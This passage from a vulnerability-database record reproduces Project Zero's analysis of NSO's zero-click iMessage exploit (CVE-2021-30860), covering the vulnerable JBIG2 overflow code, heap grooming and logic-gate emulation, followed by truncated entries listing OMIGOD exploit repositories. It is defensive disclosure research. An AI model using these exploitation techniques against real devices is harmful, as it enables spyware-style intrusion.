this research. \n\nEarlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.\n\nBased on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.\n\nThe vulnerability discussed in this blog post was fixed on September 13, 2021 in [iOS 14.8](<https://support.apple.com/en-us/HT212807>) as CVE-2021-30860.\n\nNSO\n\n[NSO](<https://en.wikipedia.org/wiki/NSO_Group>)[ Group](<https://en.wikipedia.org/wiki/NSO_Group>) is one of the [highest-profile providers of \"access-as-a-service\"](<https://www.atlanticcouncil.org/in-depth-research-reports/report/countering-cyber-proliferation-zeroing-in-on-access-as-a-service/>), selling packaged hacking solutions which [enable nation state actors without a home-grown offensive cyber capability to \"pay-to-play\"](<https://www.atlanticcouncil.org/in-depth-research-reports/issue-brief/surveillance-technology-at-the-fair/>), vastly expanding the number of nations with such cyber capabilities.\n\nFor years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package \"Pegasus\". Despite NSO's claims that they \"[[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products](<https://www.nsogroup.com/governance/human-rights-policy/>)\" Pegasus has been linked to [the hacking of the New York Times journalist Ben Hubbard by the Saudi regime](<https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/>), [hacking of human rights defenders in Morocco](<https://www.amnesty.org/en/latest/research/2019/10/morocco-human-rights-defenders-targeted-with-nso-groups-spyware/>) and [Bahrain](<https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/>), [the targeting of Amnesty International staff](<https://www.amnesty.org/en/latest/research/2018/08/amnesty-international-among-targets-of-nso-powered-campaign/>) and dozens of other cases.\n\nLast month the United States added NSO to the \"Entity List\", severely restricting the ability of US companies to do business with NSO and [stating in a press release](<https://www.commerce.gov/news/press-releases/2021/11/commerce-adds-nso-group-and-other-foreign-companies-entity-list>) that \"[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent.\"\n\nCitizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.\n\nFrom One to Zero\n\nIn previous cases such as the [Million Dollar Dissident from 2016](<https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/>), targets were sent links in SMS messages:\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvP0VlEQXC6TZWOu-zPOWC-Pnyy3uqOJpwPeP3Y_rz-ZO_MvrqjiMtMwxzIz_E8NdNyrV_Fvx-RRApoMxAPrYQcHO4eiico20He9zMm3UT5-j84CCRZDJq5hjMmeIKd0aLMsflCkfrfVHp1z1PbQmYPFX6UlVtn6_gF8P6iTQaAHL3EQ6iKs4VDdEZ/s870/image2%281%29.jpg)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvP0VlEQXC6TZWOu-zPOWC-Pnyy3uqOJpwPeP3Y_rz-ZO_MvrqjiMtMwxzIz_E8NdNyrV_Fvx-RRApoMxAPrYQcHO4eiico20He9zMm3UT5-j84CCRZDJq5hjMmeIKd0aLMsflCkfrfVHp1z1PbQmYPFX6UlVtn6_gF8P6iTQaAHL3EQ6iKs4VDdEZ/s870/image2%281%29.jpg>)\n\nScreenshots of Phishing SMSs reported to Citizen Lab in 2016\n\nsource: <https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/>\n\nThe target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.\n\nOne weird trick\n\nThe initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.\n\niMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the [iMessage parsing and processing pipeline](<https://googleprojectzero.blogspot.com/2021/01/a-look-at-imessage-in-ios-14.html>) (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the \"BlastDoor\" sandbox), passing any image file received with the extension .gif:\n\n[IMGIFUtils copyGifFromPath:toDestinationPath:error]\n\nLooking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.\n\nThe ImageIO library, [as detailed in a previous Project Zero blogpost](<https://googleprojectzero.blogspot.com/2020/04/fuzzing-imageio.html>), is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this \"fake gif\" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code. \n\nNote: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.\n\nA PDF in your GIF\n\nNSO uses the \"fake gif\" trick to target a vulnerability in the CoreGraphics PDF parser.\n\nPDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...\n\nExtreme compression\n\nIn the late 1990's, bandwidth and storage were much more scarce than they are now. It was in that environment that the [JBIG2](<https://en.wikipedia.org/wiki/JBIG2>) standard emerged. JBIG2 is a domain specific image codec designed to compress images where pixels can only be black or white.\n\nIt was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the XEROX WorkCenter device shown below. If you used the scan to pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3gos8L_dEuVS2ltgPw-T3WxC6COMIyYoq4DlSN8Z8XgNueXzXBBlQF_BusBrKSJowwIu0OouJLMwZwPZyMiORoXCShUtbb65C3ZkKU9Tzo8ANc5862ImuSa9v1pjcjxR2v4T-UdpMYlV7DEsVgr43Mj3yAjHn_EXcxVxXFhxHqq1QXoEdP3S1JnRm/s700/image10.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3gos8L_dEuVS2ltgPw-T3WxC6COMIyYoq4DlSN8Z8XgNueXzXBBlQF_BusBrKSJowwIu0OouJLMwZwPZyMiORoXCShUtbb65C3ZkKU9Tzo8ANc5862ImuSa9v1pjcjxR2v4T-UdpMYlV7DEsVgr43Mj3yAjHn_EXcxVxXFhxHqq1QXoEdP3S1JnRm/s700/image10.png>)\n\nA Xerox WorkCentre 7500 series multifunction printer, which used JBIG2\n\nfor its scan-to-pdf functionality\n\nsource: <https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications>\n\nThe PDFs files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:\n\nTechnique 1: Segmentation and substitution\n\nEffectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2YXgDQeGK1E3GixB5S11rI1e7Xqi3cQJKuL4ZklPLYw8U1hbbEDXGOyCfcqqhoQT2evw5kHYC3Ba9RWx21XHknWvjxFKg5te5-K19ZYaoTR2wD4AmBw_c-9RXNUuonuD2TT21aTlvihuC_i_t3GgYFjw2pzL7YshGF7BZa4bq-i44V63NN6Pv7yzy/s352/image4%284%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2YXgDQeGK1E3GixB5S11rI1e7Xqi3cQJKuL4ZklPLYw8U1hbbEDXGOyCfcqqhoQT2evw5kHYC3Ba9RWx21XHknWvjxFKg5te5-K19ZYaoTR2wD4AmBw_c-9RXNUuonuD2TT21aTlvihuC_i_t3GgYFjw2pzL7YshGF7BZa4bq-i44V63NN6Pv7yzy/s352/image4%284%29.png>)\n\nSimple pattern matching can find all the shapes which look similar on a page,\n\nin this case all the 'e's\n\nJBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition.) A JBIG encoder is just looking for connected regions of pixels and grouping similar looking regions together. The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them:\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2k3SPN7fikk3DnL-5YdWTK6_n1JTjvlb6qC-4tVnHeqU16cM6VWYjmMzNL9ZwMK0MXOhWITS_P0kgsx3YFHDaI2Rd5R8f1CM55ccmCBROIlyymNW2jSSCRWCpddWLuIzhGG6uB8PDKcDg5IpWW7NjdvVPZRFme3Hk4EHHmXZwEJYoohHgaVa31w0u/s327/image1%285%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2k3SPN7fikk3DnL-5YdWTK6_n1JTjvlb6qC-4tVnHeqU16cM6VWYjmMzNL9ZwMK0MXOhWITS_P0kgsx3YFHDaI2Rd5R8f1CM55ccmCBROIlyymNW2jSSCRWCpddWLuIzhGG6uB8PDKcDg5IpWW7NjdvVPZRFme3Hk4EHHmXZwEJYoohHgaVa31w0u/s327/image1%285%29.png>)\n\nReplacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios\n\nIn this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the \"reference glyph\" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and \"draws\" the exact same glyph at all the stored locations.\n\nThere's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. [D. Kriesel's blog has some motivating examples](<http://www.dkriesel.com/en/blog/2013/0802_xerox-workcentres_are_switching_written_numbers_when_scanning>) where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.\n\nTechnique 2: Refinement coding\n\nAs mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate \"less lossy\" compression mode.\n\nIt does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-7RiEuIp4vanQlf6nxJf1tfbuA7B61DISNjLlNxXrvSqFnqxcvSLPN6_60h2ypZdjDKHtNmCN3Nr5W66JaLw_j5iSxxntOZ0eXFB2wEQHfUjs_9LIwmckCXdTzurtKgpwyaWkGfInvM35YC3kp_K4qyJYxV4HDEf0E9W_Zqt3OelULvnfSlWAc2Kw/s267/image3%285%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-7RiEuIp4vanQlf6nxJf1tfbuA7B61DISNjLlNxXrvSqFnqxcvSLPN6_60h2ypZdjDKHtNmCN3Nr5W66JaLw_j5iSxxntOZ0eXFB2wEQHfUjs_9LIwmckCXdTzurtKgpwyaWkGfInvM35YC3kp_K4qyJYxV4HDEf0E9W_Zqt3OelULvnfSlWAc2Kw/s267/image3%285%29.png>)\n\nUsing the XOR operator on bitmaps to compute a difference image\n\nIn this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a \"context\" for the compression.\n\nRather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the \"lossiness\" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to \"read\" values already present on the output canvas.\n\nA JBIG2 stream\n\nMost of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, [the source code for which is freely available](<https://www.xpdfreader.com/download.html>).\n\nThe JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page.\n\nSegments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.\n\nA JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.\n\nA JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.\n\nJBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.\n\nThe vulnerability\n\nThe vulnerability is a classic integer overflow when collating referenced segments:\n\nGuint numSyms; // (1)\n\nnumSyms = 0;\n\nfor (i = 0; i < nRefSegs; ++i) {\n\nif ((seg = findSegment(refSegs[i]))) {\n\nif (seg->getType() == jbig2SegSymbolDict) {\n\nnumSyms += ((JBIG2SymbolDict *)seg)->getSize(); // (2)\n\n} else if (seg->getType() == jbig2SegCodeTable) {\n\ncodeTables->append(seg);\n\n}\n\n} else {\n\nerror(errSyntaxError, getPos(),\n\n\"Invalid segment reference in JBIG2 text region\");\n\ndelete codeTables;\n\nreturn;\n\n}\n\n}\n\n...\n\n// get the symbol bitmaps\n\nsyms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)\n\nkk = 0;\n\nfor (i = 0; i < nRefSegs; ++i) {\n\nif ((seg = findSegment(refSegs[i]))) {\n\nif (seg->getType() == jbig2SegSymbolDict) {\n\nsymbolDict = (JBIG2SymbolDict *)seg;\n\nfor (k = 0; k < symbolDict->getSize(); ++k) {\n\nsyms[kk++] = symbolDict->getBitmap(k); // (4)\n\n}\n\n}\n\n}\n\n} \n \n--- \n \nnumSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.\n\nThat smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.\n\nInside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.\n\nWithout another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).\n\nConveniently since JBIG2Bitmap inherits from JBIG2Segment the seg->getType() virtual call succeed even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls) but the returned type will now not be equal to jbig2SegSymbolDict thus causing further writes at (4) to not be reached and bounding the extent of the memory corruption.\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fFsg7COjTu5Aq2rV9CTyka-eczC_BvD3wrGUP3XL5W9RHoGOKElzDMbDWLrgp1BJfRvEjcw36ZdMgbA2iwnjj0jqDKGBS94UL2tdcH0evSr66V5uGUrhra3PlGyKvCznPT2rSUL3ZegDR-FXRbKw6SJFzNrgubTbAzKXKVrga6h-B3VcHFqOU9zx/s506/image6%282%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fFsg7COjTu5Aq2rV9CTyka-eczC_BvD3wrGUP3XL5W9RHoGOKElzDMbDWLrgp1BJfRvEjcw36ZdMgbA2iwnjj0jqDKGBS94UL2tdcH0evSr66V5uGUrhra3PlGyKvCznPT2rSUL3ZegDR-FXRbKw6SJFzNrgubTbAzKXKVrga6h-B3VcHFqOU9zx/s506/image6%282%29.png>)\n\nA simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap\n\nBoundless unbounding\n\nDirectly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render). \n\nJBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer\u2019s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0hdaagzsqy4Esf9vjf9KS6euQUhDYTUMu9xDO8q4nxUCbVjpLmxBCJkixLWpg8YETgQNC-2DYLlPss0Eo46knC-qDRI0dLEcOHPvjbwGfaF_E_7EimexamWDy68_id27V2y9k0J2moeJg94okQoOtrMyejAg7bYepIgtdcgNH7NRz7Ne-mWeWs1QA/s1070/image7%282%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0hdaagzsqy4Esf9vjf9KS6euQUhDYTUMu9xDO8q4nxUCbVjpLmxBCJkixLWpg8YETgQNC-2DYLlPss0Eo46knC-qDRI0dLEcOHPvjbwGfaF_E_7EimexamWDy68_id27V2y9k0J2moeJg94okQoOtrMyejAg7bYepIgtdcgNH7NRz7Ne-mWeWs1QA/s1070/image7%282%29.png>)\n\nThe memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow\n\nBy carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian (meaning that the w and line fields are likely to be overwritten with 0x1 \u2014 the most-significant half of a JBIG2Bitmap pointer) and the segNum and h fields are likely to be overwritten with the least-significant half of such a pointer, a fairly random value depending on heap layout and ASLR somewhere between 0x100000 and 0xffffffff.\n\nThis gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of \"unbounding\" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.\n\nThe heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:\n\n* * *\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidgMVssjmRf7_LhtPKH-MCSJdXOZk5t6EAm-FLazQh5ssP2ksV4kIlzxSIOGz5Elrm8ROuBz92K4-Jthwu4WYa8vN61EgdpB5dbtuCULDRFhqK1TkPOE8xl63p9MAIgf1dNwYKgkYMwlgoNEFcvdDmXy6GdlcRQ5ESrN8d3bAYIEse7dGPQc3cbo8h/s550/image5%282%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidgMVssjmRf7_LhtPKH-MCSJdXOZk5t6EAm-FLazQh5ssP2ksV4kIlzxSIOGz5Elrm8ROuBz92K4-Jthwu4WYa8vN61EgdpB5dbtuCULDRFhqK1TkPOE8xl63p9MAIgf1dNwYKgkYMwlgoNEFcvdDmXy6GdlcRQ5ESrN8d3bAYIEse7dGPQc3cbo8h/s550/image5%282%29.png>)\n\nThe memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory\n\nBy rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.\n\nAt this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a \"canonical\" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?\n\nMy other compression format is turing-complete!\n\nAs mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.\n\nIn practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded\u2026 it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFkcS4JjzhV7pzJ5kVEmFj7WLW5Zzdc0JkYDaQBhVYIDayiYOksOID0LFOFGr9qQA44qwe3LRN9KNqOelKIflmcTDnR3k6qrtfvJ4wsoTDyuM59nmE6DGM_n_wOUMNY8HoLybtywIMq2-VdeFVwHHc9aDe0tkExa4hfvXKJ6o_m2QYT2LXp4NGDNJI/s551/image9%281%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFkcS4JjzhV7pzJ5kVEmFj7WLW5Zzdc0JkYDaQBhVYIDayiYOksOID0LFOFGr9qQA44qwe3LRN9KNqOelKIflmcTDnR3k6qrtfvJ4wsoTDyuM59nmE6DGM_n_wOUMNY8HoLybtywIMq2-VdeFVwHHc9aDe0tkExa4hfvXKJ6o_m2QYT2LXp4NGDNJI/s551/image9%281%29.png>)\n\nThe memory layout showing how logical operators can be applied out-of-bounds\n\nIt's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?\n\nYou can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.\n\nWith a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBpKF2iKJhndHIFtGm9xUBVjpXOM4GYcwSdNyfuUvwI-883zmbnhi_Ch6CR4XEaA6D2uaGkU3g8rNocZS_ZlWXD8rTSRGTgYact6ar43k8ywMZG6hnjDz8Yr3pC3Fh4W3dggIA_XriPw1Vc6myG-18TPe8Ffj_NGuywLqz4tpdlrbMAso-CBZcM_4X/s265/image8%282%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBpKF2iKJhndHIFtGm9xUBVjpXOM4GYcwSdNyfuUvwI-883zmbnhi_Ch6CR4XEaA6D2uaGkU3g8rNocZS_ZlWXD8rTSRGTgYact6ar43k8ywMZG6hnjDz8Yr3pC3Fh4W3dggIA_XriPw1Vc6myG-18TPe8Ffj_NGuywLqz4tpdlrbMAso-CBZcM_4X/s265/image8%282%29.png>)\n\nAn AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1 creating an NAND.\n\nA NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be [built to compute any computable function](<https://www.nand2tetris.org/>).\n\nPractical circuits\n\nJBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.\n\nThe bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.\n\nIn a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-15T00:00:00", "type": "googleprojectzero", "title": "\nA deep dive into an NSO zero-click iMessage exploit: Remote Code Execution\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30860"], "modified": "2021-12-15T00:00:00", "id": "GOOGLEPROJECTZERO:13ED546BFEDF54BBE09B80D00208352E", "href": "https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-07-13T19:11:02", "description": "# CVE-2021-38647: Omigod\nAnother exploit for Omigod written quic...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-26T18:06:00", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-29T10:57:34", "id": "A99AB73C-8E46-5B9C-A402-F78F96EE2327", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:11:26", "description": "# OMIGOD PoC\n\n## Usage\n\n```\n$ go run CVE-2021-38647.go -h\n\nUSAGE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T01:05:22", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-22T22:40:10", "id": "CE2FB7D7-ABCF-58F8-AACC-D0E6FEE8865A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-28T15:11:07", "description": "# CVE-2021-38647 AKA \"OMIGOD\"\nA Zeek package which detects CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T04:51:02", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 